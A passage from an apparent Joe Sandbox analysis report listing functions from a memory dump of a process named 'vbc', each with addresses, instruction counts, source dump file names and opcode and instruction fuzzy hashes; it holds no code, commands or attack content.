                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0e1b2208d0fadadeee44bbd395f22621f4b0dd9037124c80bd5ecf10c82c1b8b
                                                      • Instruction ID: 81aa63a8a573ad4e9085ba3872324504f2a0aa39979875abde3d4a7f3ca8b594
                                                      • Opcode Fuzzy Hash: 0e1b2208d0fadadeee44bbd395f22621f4b0dd9037124c80bd5ecf10c82c1b8b
                                                      • Instruction Fuzzy Hash: 4D31D076A00219ABDB15DF99C844FAEF7B6FB48B40F554168EC00EB244E770AD40CBA0
                                                      Function 058107AF Relevance: .1, Instructions: 95COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4602ea848c82cece10de4885011a75175a158ed6c986c05ce8c3b1d0ebb4f69f
                                                      • Instruction ID: b328886be7f42134a83700b7ccd4ab9c4f846cf83c974d1c3a6e2278deb18c53
                                                      • Opcode Fuzzy Hash: 4602ea848c82cece10de4885011a75175a158ed6c986c05ce8c3b1d0ebb4f69f
                                                      • Instruction Fuzzy Hash: 3D31C232A08715DBC712EF288C99E6BBBAEAF84250F014529FC56D7350DE30DC519BD6
                                                      Function 058D60B8 Relevance: .1, Instructions: 95COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7e33ac1525f2c6c23be7037f42618dbfd26d3418c155a2fe6ee3e429244c3a46
                                                      • Instruction ID: 0fc3809ea5ca46c19d86cb1fd54d7214c06342d24dc0166bdb95f4c93a7d7fee
                                                      • Opcode Fuzzy Hash: 7e33ac1525f2c6c23be7037f42618dbfd26d3418c155a2fe6ee3e429244c3a46
                                                      • Instruction Fuzzy Hash: BF31C47174061AEFDF12AF5AC850A6EBBEAAF44754F044469E905EB341EA30DC018BA1
                                                      Function 05818550 Relevance: .1, Instructions: 94COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3643ade3cf1da14af5ef0e4224a9ddabf3c5e0867fae0c6dbaf2dc16acdb1e61
                                                      • Instruction ID: b3745651eb5d0229bdae75e3378998a574e911a2f346c475b805bdc7d3fc127a
                                                      • Opcode Fuzzy Hash: 3643ade3cf1da14af5ef0e4224a9ddabf3c5e0867fae0c6dbaf2dc16acdb1e61
                                                      • Instruction Fuzzy Hash: 53317AB56093018FD320CF19C841B6ABBE9FB88710F05496DEC8ADB291D770EC44CBA6
                                                      Function 0580D6AA Relevance: .1, Instructions: 93COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 759af7da7484718429cce7f3e89ec17e8e493d8f66f8a62f4e587b70ab487789
                                                      • Instruction ID: a23b8796fee945cc6307f5ffbd75f57fb1484cf59bb621675b0f5d1a41501afa
                                                      • Opcode Fuzzy Hash: 759af7da7484718429cce7f3e89ec17e8e493d8f66f8a62f4e587b70ab487789
                                                      • Instruction Fuzzy Hash: A131B436602204AFDB61CED8CC80F7A73A9EF80754F299428ED15DB295D770DD40CB91
                                                      Function 058157C0 Relevance: .1, Instructions: 92COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4846ddf139dc7a43260295bd191153cdbf679a855a737ecf483a9d7eed6fc516
                                                      • Instruction ID: 238031b11ee4847f117367f5e6f478d82d1cb53f36ea7a9479cdbf174343a1cf
                                                      • Opcode Fuzzy Hash: 4846ddf139dc7a43260295bd191153cdbf679a855a737ecf483a9d7eed6fc516
                                                      • Instruction Fuzzy Hash: 7A315A35715A09EFDB51AB28DA85EAABBA6FF84214F445029EC01C7B51DB34EC30CF85
                                                      Function 0584A6C7 Relevance: .1, Instructions: 92COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                                      • Instruction ID: 3f37a10582ca88ccb47894c1d986000cc0acebf3e3d14e0e359e81de846d128f
                                                      • Opcode Fuzzy Hash: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                                      • Instruction Fuzzy Hash: C9310572B44B04AFD774CF6AC941B67B7FABB08A50B14492DAD9AC7651E630E9008F60
                                                      Function 05867190 Relevance: .1, Instructions: 89COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3d9f232daa6456112ef7cca9ac13d1ecc1d2608bc40d33be58fee952b0e99bbe
                                                      • Instruction ID: 44ded58614404d0a452649e864cc32542da4667e18e6c23688f8479233909ee5
                                                      • Opcode Fuzzy Hash: 3d9f232daa6456112ef7cca9ac13d1ecc1d2608bc40d33be58fee952b0e99bbe
                                                      • Instruction Fuzzy Hash: E7314775604206CFC710CF18C480956BBF6FF89318B2986AAE959DB325EB30ED46CBD1
                                                      Function 0583438F Relevance: .1, Instructions: 89COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 824e7283849ad7c701e5186cd27a002a13d9c6233c40850374a62b4a1cfd1594
                                                      • Instruction ID: d81badee5e24cfb77ccbb8e066b843d14520440ddbd9d07fec7e334f0a5c3868
                                                      • Opcode Fuzzy Hash: 824e7283849ad7c701e5186cd27a002a13d9c6233c40850374a62b4a1cfd1594
                                                      • Instruction Fuzzy Hash: 8931C232B053099FCB10EFA8C98AA6EB7FABB84704F008539D946D7264E734DD45CB91
                                                      Function 0580E420 Relevance: .1, Instructions: 88COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c77387d12e40eddbc04c68d697bc4455fb21ea19761c3b72f6674848aa9c2339
                                                      • Instruction ID: 0a62e9d14093f628ca97daac65db83fd3cb6c81b196e66d37e623628cad01303
                                                      • Opcode Fuzzy Hash: c77387d12e40eddbc04c68d697bc4455fb21ea19761c3b72f6674848aa9c2339
                                                      • Instruction Fuzzy Hash: E931AF32A41A2C9BDB65DA18CC41FEEB7AEEB05750F0108A5EA45E72D0D6749E808E91
                                                      Function 0580C156 Relevance: .1, Instructions: 88COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 1ebba94d3ae3e6cf2d971172f4261be963db3b5d4b83292675a0f9677ef8bea3
                                                      • Instruction ID: e7bec9c7341888609fbe8476a1f07f87a268fad6dba7a2f6511ce189a7a1b71b
                                                      • Opcode Fuzzy Hash: 1ebba94d3ae3e6cf2d971172f4261be963db3b5d4b83292675a0f9677ef8bea3
                                                      • Instruction Fuzzy Hash: 0A31E5B67013109BC720AF28CC45B797BB5BF41314F5485A9DC86DB381DA74DD86CB92
                                                      Function 058CC3CD Relevance: .1, Instructions: 88COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                                      • Instruction ID: 782c3a333a15b0bd7db462958addd67ca60b30ca26d4a18172bad74872095cf4
                                                      • Opcode Fuzzy Hash: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                                      • Instruction Fuzzy Hash: F4213836700B51A6CB15ABA88814EBABFB4EF40710F00C09EFDB9C7A90E634DD40C761
                                                      Function 05844588 Relevance: .1, Instructions: 87COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                                      • Instruction ID: e74a1c8b5eb373cfdb373021030113f6c11fe968298bdc3efb35ec9762126ce0
                                                      • Opcode Fuzzy Hash: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                                      • Instruction Fuzzy Hash: 2A218D32A00608EBDF11CF58D980A8ABBA5FF48714F108069ED15DB251D670EE058F90
                                                      Function 058444B0 Relevance: .1, Instructions: 87COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: cca84b76b4ef894948332ec7dc3aa8c591f15f875d650db97e7985b1a9982cb8
                                                      • Instruction ID: a7987c044d6c2caa471caa80897c905bcec1bf21c3b40cfc8ea252193558cfe8
                                                      • Opcode Fuzzy Hash: cca84b76b4ef894948332ec7dc3aa8c591f15f875d650db97e7985b1a9982cb8
                                                      • Instruction Fuzzy Hash: C021A0726087899BCF21DE18C840B6BB7E5FB88760F164919FC59DB250DB70ED018FA2
                                                      Function 0588E609 Relevance: .1, Instructions: 86COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: cdae8bfec513a726f035dc4201064df2cf06898aea051a3c3cc85d1cb0622aa8
                                                      • Instruction ID: 1e3e9885b7d28ebadc3a79604d5fdb6b445a00b903e8c8a85992f6aa784472b2
                                                      • Opcode Fuzzy Hash: cdae8bfec513a726f035dc4201064df2cf06898aea051a3c3cc85d1cb0622aa8
                                                      • Instruction Fuzzy Hash: 45314B7560420AEFCB14DF58C884AAEB7BAFF84314B154459EC0ADB391E771AE50CB91
                                                      Function 0580E388 Relevance: .1, Instructions: 86COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                                      • Instruction ID: 3ac4bd5a6f609feb86eb8089dede2f19300bb9d8b21d9c3f412cb103f5793aca
                                                      • Opcode Fuzzy Hash: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                                      • Instruction Fuzzy Hash: 07317A31600A04AFD761CB68C884F6AB7B9FF44254F1049A9E952CB280E730ED01CB51
                                                      Function 0584D530 Relevance: .1, Instructions: 85COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 5e49510276c65a32c05eca3f2cf9036ed0f0511b2e03ca28cdb564a060683609
                                                      • Instruction ID: d259368c332d05f9ded36c6f9cb31e47f97e0beb1d09c1b998d3bfceb8d38b8c
                                                      • Opcode Fuzzy Hash: 5e49510276c65a32c05eca3f2cf9036ed0f0511b2e03ca28cdb564a060683609
                                                      • Instruction Fuzzy Hash: 4F21B1716093149FC711FF68C948B2A7BE9FB44754F440C29BE49D7290EB24EC448BE2
                                                      Function 05813616 Relevance: .1, Instructions: 84COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7a901c27e77456d77081e9b2499d4463eead041130a11fbb5a90429ae4fb82b9
                                                      • Instruction ID: aecef52eca3dc632699e77c7c81f83877a81a0eae94a3f0be53fc02f2fd06190
                                                      • Opcode Fuzzy Hash: 7a901c27e77456d77081e9b2499d4463eead041130a11fbb5a90429ae4fb82b9
                                                      • Instruction Fuzzy Hash: C821C3712053509FCB21EF18C948B26BBAABF81A20F055C69EC469B650DB70EC44DB86
                                                      Function 058906F1 Relevance: .1, Instructions: 79COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 86c1de1d4b5cd53c475b414d9a0884ac2b0a63d423d8522fff5575ed79215fe1
                                                      • Instruction ID: d07614bb4eb9318a7d0aded6883001062d4fa0912b5ea03b7ddeb41a6b3f551c
                                                      • Opcode Fuzzy Hash: 86c1de1d4b5cd53c475b414d9a0884ac2b0a63d423d8522fff5575ed79215fe1
                                                      • Instruction Fuzzy Hash: D9219E75A00229EBCF14DF59C885ABEB7F4FF48750F540069E841EB250D739AD41DBA1
                                                      Function 05849660 Relevance: .1, Instructions: 78COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 79112d9a6c9309d40dcd0c02deaa1e723e70b76663427bab801657f0ced1f3bf
                                                      • Instruction ID: fcca6799726b7e6657dfcbc505ae5b869651f10cb5645560a39b4658da872e66
                                                      • Opcode Fuzzy Hash: 79112d9a6c9309d40dcd0c02deaa1e723e70b76663427bab801657f0ced1f3bf
                                                      • Instruction Fuzzy Hash: 4B21A130214708DFDF31AA29CC54F377BA3FB90228F105A19EC56C69E0EB29AC518F56
                                                      Function 0589019F Relevance: .1, Instructions: 78COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: fcc035a35b764152cac5b04cdef9989331c535293b41bb0db33c8d45d1260c9d
                                                      • Instruction ID: 74b6ecfedbcce22f6aa79bfaca3565689b47cfd4b3dac268f1fb778c3311d748
                                                      • Opcode Fuzzy Hash: fcc035a35b764152cac5b04cdef9989331c535293b41bb0db33c8d45d1260c9d
                                                      • Instruction Fuzzy Hash: E3218B71600654EFCB15DBACC848A6AB7A8FF48740F18006AFD45DB6A1DA38ED40CB69
                                                      Function 058315A9 Relevance: .1, Instructions: 69COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 29802a1ca24c6965babefc6623953e4fc32110ab479eab20bfca4cc576a297b9
                                                      • Instruction ID: c0e7beb1274af5e87c8d81f9aad57d3090a98f59b976736c296129a5dffac917
                                                      • Opcode Fuzzy Hash: 29802a1ca24c6965babefc6623953e4fc32110ab479eab20bfca4cc576a297b9
                                                      • Instruction Fuzzy Hash: F3210171604689CFD726CB99C848B797BEABF00784F0904A1EC02CB292EA28CC40C6A1
                                                      Function 0580B765 Relevance: .1, Instructions: 69COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: f0cf2b5dc8830dfc65152f5e7375e19523198ba743435a92ec5bd9c26cd06f73
                                                      • Instruction ID: 15a02695b9490b0dc7ec671870ef935e179da7567a0f3ac4f5aaaffd4cc889ce
                                                      • Opcode Fuzzy Hash: f0cf2b5dc8830dfc65152f5e7375e19523198ba743435a92ec5bd9c26cd06f73
                                                      • Instruction Fuzzy Hash: F6213372210A00DFC722EF28C946B19BBF5FF08659F144928E50AD66A1CB38E850CB45
                                                      Function 05818770 Relevance: .1, Instructions: 68COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c01ab3f781ed7a60bc2cd0dcd387de1b98ce7ca3acc5d45419d2e7a6ff79df9b
                                                      • Instruction ID: 522e98138ace08de98c58e10d70e095d486cdd80c0e61227c2c1756ec42f2dfe
                                                      • Opcode Fuzzy Hash: c01ab3f781ed7a60bc2cd0dcd387de1b98ce7ca3acc5d45419d2e7a6ff79df9b
                                                      • Instruction Fuzzy Hash: AD11C1317006149BCB11CF49C4C1A26B7EEFF8A754B188469ED09EF204D6B2DD01CF94
                                                      Function 05840124 Relevance: .1, Instructions: 68COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                                      • Instruction ID: d3c8c0f9ae3334f0546ea594f02eff5b18531fe8012e5ff08c07579f91bee888
                                                      • Opcode Fuzzy Hash: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                                      • Instruction Fuzzy Hash: 99119D72605708EFDB22AA98CC49FABBBB9EB80754F100429EE05DF190D771ED44CB65
                                                      Function 05813720 Relevance: .1, Instructions: 67COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0162f046e46c1baed94be767e0ab0169d1218a7e2ca0dd694f0c7fc8b2658451
                                                      • Instruction ID: 5043c0018a0be0665e1b80a77b5783a3f533338473b2436748369e83e056de6f
                                                      • Opcode Fuzzy Hash: 0162f046e46c1baed94be767e0ab0169d1218a7e2ca0dd694f0c7fc8b2658451
                                                      • Instruction Fuzzy Hash: 1F21B371A043098BEB159F5DD0487EE76A8BB88318F298828DC16972D0CFB89D85C759
                                                      Function 058180E9 Relevance: .1, Instructions: 66COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6b289bf5283954d7bdfcd94eb3e4f8f2e0b87440cb40e1f2521491a34c81d8b3
                                                      • Instruction ID: 1cf8dc36013f5bbc63a0143d2288be3ab39d3688df8fb0143663107db347ca0c
                                                      • Opcode Fuzzy Hash: 6b289bf5283954d7bdfcd94eb3e4f8f2e0b87440cb40e1f2521491a34c81d8b3
                                                      • Instruction Fuzzy Hash: A0215E76A40209DFCB14DF58C581A6EBBFAFB89718F24416DD905AB310CB71AD46CF90
                                                      Function 0584674D Relevance: .1, Instructions: 65COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7d5d9783c48918dcf62ed06b92424f13cb614beddb33babd8337c48404b64b87
                                                      • Instruction ID: 9f65d11899721fdcdbbfbca25473c4ef85d7a26d77e18124d97498c999f67c31
                                                      • Opcode Fuzzy Hash: 7d5d9783c48918dcf62ed06b92424f13cb614beddb33babd8337c48404b64b87
                                                      • Instruction Fuzzy Hash: F0215875614B04EFC720CF69C881F66B7E9FB85254F50892DE99AC7250EA30AC50CBA0
                                                      Function 058466B0 Relevance: .1, Instructions: 61COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e764ebacd315647a0df0891700d32ddcb105b4e12aeff210f05bec95f2f97b79
                                                      • Instruction ID: 27a0549737ca963d742f4540af8df5f873edb72aa5961016c1132f26d2987136
                                                      • Opcode Fuzzy Hash: e764ebacd315647a0df0891700d32ddcb105b4e12aeff210f05bec95f2f97b79
                                                      • Instruction Fuzzy Hash: 68118C76A013199FCB25DF5AC580E6ABBEAAF85650B05817EED06DB310EB34DD00CF90
                                                      Function 058327ED Relevance: .1, Instructions: 58COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 719b1876cb181826ecef7e00c0683391adb166472f3585961ea8ceabf791e7f6
                                                      • Instruction ID: 1732e60ca1a263fe8f35ee3d38872da25b43dd88372d7972bf593cb847ebd8cd
                                                      • Opcode Fuzzy Hash: 719b1876cb181826ecef7e00c0683391adb166472f3585961ea8ceabf791e7f6
                                                      • Instruction Fuzzy Hash: 1D01DB75709748AFE31A926DDC99F3B7B9DEF80755F090465FC06D7151D914DC00C2A1
                                                      Function 05814690 Relevance: .1, Instructions: 57COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8f6de7d9c594a41cf5bf5a5afbc7c60dfca26af36ffed1683cc30f40f5b285e2
                                                      • Instruction ID: 3ccae9c843c665a78076c75e85a77407fa7d2e39ddd16875b891356ba9c9f6ee
                                                      • Opcode Fuzzy Hash: 8f6de7d9c594a41cf5bf5a5afbc7c60dfca26af36ffed1683cc30f40f5b285e2
                                                      • Instruction Fuzzy Hash: B8118876244748AFDB25DA59D844F667BA9EB8AB68F004919FC06CB260C770EC40CF68
                                                      Function 058CD6F0 Relevance: .1, Instructions: 57COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: ab5dca7662d95f66bb5cdf7901944074af6dd6205da9398680eb86638002d29b
                                                      • Instruction ID: 375707d154e0091891b0c0beaf3bb7a32591875202f792190f94bb9288adf65d
                                                      • Opcode Fuzzy Hash: ab5dca7662d95f66bb5cdf7901944074af6dd6205da9398680eb86638002d29b
                                                      • Instruction Fuzzy Hash: F9016175705249EB9B15EAAAC944DAF7BBDEF85A44F0000ADAD05D3250E730EE02C7A0
                                                      Function 0583B052 Relevance: .1, Instructions: 57COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 1d67046eeb3fa4265609f75aa5b8184cb63a994c02c59dfd2bba3ce3d1e66d8f
